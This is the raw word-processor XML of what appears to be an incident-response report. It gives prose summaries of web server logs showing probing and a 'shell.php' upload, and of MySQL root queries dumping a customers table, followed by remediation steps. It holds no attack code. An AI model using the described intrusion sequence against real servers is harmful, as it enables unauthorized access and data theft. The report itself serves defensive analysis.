        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Conduct a post-incident review to identify lessons learned and areas for improvement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Update security policies and procedures based on the findings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webserver Access logs</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This artifact shows web server log entries. It starts with access from what appears to be a web crawler bot ("SiteCheckerBotCrawler"). Then, there's a series of GET requests from IP address 138.68.92.163, using an outdated browser ("Mozilla/4.0 (compatible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; MSIE 6.0; Windows NT 5.1)"), trying to access various common files and directories (like /randomfile1, /index, /archive). Most of these requests result in "404 Not Found" errors. However, the attacker finds an upload directory (/uploads/) and successfull</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y uploads a potentially malicious PHP file ("shell.php"). This could indicate an attempt to exploit a vulnerability in the web server to gain unauthorized access or control. This activity should be investigated further to determine the nature of the "shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.php" file and the attacker's intentions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="nil" w:color="000000"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Database server access logs </w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This artifact shows a sequence of MySQL database queries executed by a user with root privileges. The user first connects to the database server and checks the version. Then, they list all databases, specifically focusing on the "mysql" and "phl" databases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Within the "mysql" database, they attempt to access various system tables, potentially seeking sensitive information or configuration details. In the "phl" database, they list tables, access the "customers" table, and retrieve all data from it, including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> potentially sensitive customer information. Finally, they attempt to lock the "customers" table and retrieve its schema and data again. This activity suggests a potential data breach or unauthorized access to sensitive information within the database. Fur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ther investigation is needed to determine the extent of the breach and the attacker's intentions.</w:t>
      </w:r>
      <w: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highlight w:val="none"/>
        </w:rPr>
      </w:pP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709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:sectPr>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font>
  <w:font w:name="Times New Roman">
    <w:panose1 w:val="02020603050405020304"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:panose1 w:val="05050102010706020507"/>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4">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5">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6">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7">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8">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9">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1">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2">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3">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4">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5">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6">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7">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8">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9">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1">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2">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3">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4">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5">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6">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7">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="right"/>
      <w:lvlText w:val="%1."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>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8">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29">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="right"/>
      <w:lvlText w:val="%1."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>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3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1">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2">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3">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4">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5">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6">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7">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8">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39">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4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41">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="right"/>
      <w:lvlText w:val="%1."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>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2">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="right"/>
      <w:lvlText w:val="%1."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>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5">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4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7">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4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49">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51">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4">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5">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6">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58">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5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1">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3">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65">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="o"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6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6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68">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69">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0">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1">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2">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3">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4">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="1b1c1d"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="75">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="575b5f"/>
        <w:sz w:val="14"/>
        <w:highlight w:val="white"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="76">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77">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78">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7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0">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3">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84">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85">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8">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8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0">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4">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95">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98">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9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0">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4">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5">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6">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08">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0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10">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1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12">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="right"/>
      <w:lvlText w:val="%1."/>
      <w:numFmt w:val="decimal"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>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1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14">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1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1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2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3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4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0">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
